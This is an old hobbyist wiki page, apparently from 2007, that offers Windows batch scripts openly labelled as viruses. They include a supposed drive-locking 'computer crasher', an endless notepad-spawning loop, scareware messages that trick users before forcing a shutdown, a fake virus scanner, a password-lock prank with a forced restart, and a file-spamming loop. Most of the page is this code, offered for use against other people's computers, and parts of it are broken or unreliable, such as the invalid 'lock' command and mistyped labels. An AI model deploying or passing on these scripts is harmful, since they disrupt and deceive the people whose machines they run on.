virus source CodeThis is a featured page

close
Welcome hackers,please come in and ask me anyquestions... i shall be able to help
virus source Code
INTRODUCTION
Hey this is my viruses, and batch, section. Everything in here i made up except a couple. the ones i didn't make myself have a little Astrix (*) before the name. I will teach you a couple of virus codes. They are all in batch format (if you don't know what that means, go onto my programming section and see batch). I'm not going to teach you what they mean, because that would take a lot of time. Instead, it would be really easy to just learn it from the batch part of my programming section. In there i basically tell what it means. They are not that hard if you learn batch. Also they are all batch viruses. That means they are all very simple. It can, however, do some real damage to a computer. Again i will warn you that i do not take any responsibility of your actions based on the knowledge you learn from this site. Also this page is being updated daily so check back everyday.

COMPUTER CRASHER:
well, as you may have guessed from the name, this one basically crashes your computer. Well first of all it locks all your hard drives, meaning you can't open any files. Then it shuts your computer down.then when you start it up again, unless your really smart, you can not open any files.

code:
@echo off
lock c:
lock d:
lock a:
shutdown


LOOKY!!:
This one is a little different. the name has nothing to do with it. What it does is it constantly opens up the same file, and you can't stop it unless you shut the computer down. The reason why I call it looky is because, the first time i made it i didn't thing it would work, so i made up a random word and named the file that.

code:
@echo off
:start
start notepad
goto start


UUH-OOH WHAT DID I DO:

Well this one is pretty cool. It tricks them into thinking they screwed up there computer. when you click on it a command prompt will pop up. it will say
"you have a virus, your computer will be forced to shut down. please press any button to continue"
When you press another button it starts to cont down from 10. After that it shuts your computer down.

code:
@echo off
echo you have a virus, your computer will be forced to shut down.
pause
cls
shutdown


WINDOWS VIRUS DETECTOR:
OK this is another trick it tricks people into thinking they have a virus, but unlike the last one, it deletes the virus. This is probably the 2nd best batch i have ever scripted. Try it out and tell me if you like it. Its a long one though.

code:
@echo off
:start
echo --------------------------------------------------------------------------------
echo THE WINDOWS VIRUS DETECTOR
echo --------------------------------------------------------------------------------
echo a computer virus has been detected
pause
:start
cls
echo --------------------------------------------------------------------------------
echo THE WINDOWS VIRUS DETECTOR
echo --------------------------------------------------------------------------------
echo please pick an option
echo 1=scan for viruses
echo 2=destroy virus
echo 3=repair virus
echo 4=ignore
echo 5=what is it doing
set/p "cho=please press any option= "
if %cho%==glitch goto start
if %cho%==1 goto scan
if %cho%==2 goto destroy
if %cho%==3 goto repair
if %cho%==4 exit
if %cho%==5 goto help
:scan
cls
echo scanning.
ping localhost -n 2 >nul
cls
echo scanning..
ping localhost -n 2 >nul
cls
echo scanning...
ping localhost -n 2 >nul
cls
echo scanning....
ping localhost -n 2 >nul
cls
echo scanning.
ping localhost -n 2 >nul
cls
echo scanning..
ping localhost -n 2 >nul
cls
echo scanning...
ping localhost -n 2 >nul
cls
echo scanning....
cls
goto start1
:start1
echo scanning comlpete! now pick an option for your next action:
echo 1=finish
echo 2=go back to start screen
set/p "cho=please press any option= "
if %cho%==glitch goto start1
if %cho%==1 exit
if %cho%==2 goto start
:destroy
cls
echo destroying.
ping localhost -n 2 >nul
cls
echo destroying..
ping localhost -n 2 >nul
cls
echo destroying...
ping localhost -n 2 >nul
cls
echo destroying....
ping localhost -n 2 >nul
cls
echo destroying.
ping localhost -n 2 >nul
cls
echo destroying..
ping localhost -n 2 >nul
cls
echo destroying...
ping localhost -n 2 >nul
cls
echo destroyng....
ping localhost -n 2 >nul
cls
goto start2
:start2
destroying complete! now select your next action:
echo 1=finish
echo 2=go back to start screen
set/p "cho=please press any option= "
if %cho%==glitch goto start2
if %cho%==1 exit
if %cho%==2 goto start
:repair
cls
echo repairing.
ping localhost -n 2 >nul
cls
echo repairing..
ping localhost -n 2 >nul
cls
echo repairing...
ping localhost -n 2 >nul
cls
echo repairing....
ping localhost -n 2 >nul
cls
echo repairing.
ping localhost -n 2 >nul
cls
echo repairing..
ping localhost -n 2 >nul
cls
echo repairing...
ping localhost -n 2 >nul
cls
echo repairing....
ping localhost -n 2 >nu
cls
:start3
echo repairing complete! now select your next action:
echo 1=finish
echo 2=go back to start screen
set/p "cho=please press any option= "
if %cho%==glitch goto start3
if %cho%==1 exit
if %cho%==2 goto start
:help
cls
echo do you want to know what this is doing press enter to see all the files its deleting
pause
goto setup
:setup
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
dir c:
cls
echo seen enough? if you want to see more press 1 or to go back to the options press 2
set/p "cho=press any option"
if %cho%==glitch goto start3
if %cho%==1 goto setup
if %cho%==2 goto star


basic batch virus

@echo off
echo you got owned by no0b3rt
pause
shutdown
exit

intermediate batch virus
@echo off
:owned
cls
echo please enter password
set/p inputchoice=
if %inputchoice% equ no0b3rt goto access
:denied
echo.
echo.
echo access denied!!
goto owned
:access
cls
echo welcome to your doom!
ping localhost>nul
echo ::r00tshell security of Death::
ping localhost>nul
MSG * owned by no0b3rt
shutdown -r -c " you got owned by no0b3rt
echo owned by no0b3rt
:loop
dir/s
goto loop

spam virus
@echo off
:spam virus
echo %spam%>spamvirus%spam%.exe
goto spam virus


sharma'z
sharma'z
Latest page update: made by sharma'z , Nov 23 2007, 5:24 AM EST (about this update About This Update sharma'z Edited by sharma'z

1076 words added
1 image added

view changes

- complete history)
Keyword tags: virus source Code
More Info: links to this page

Anonymous  (Get credit for your thread)


There are no threads for this page.  Be the first to start a new thread.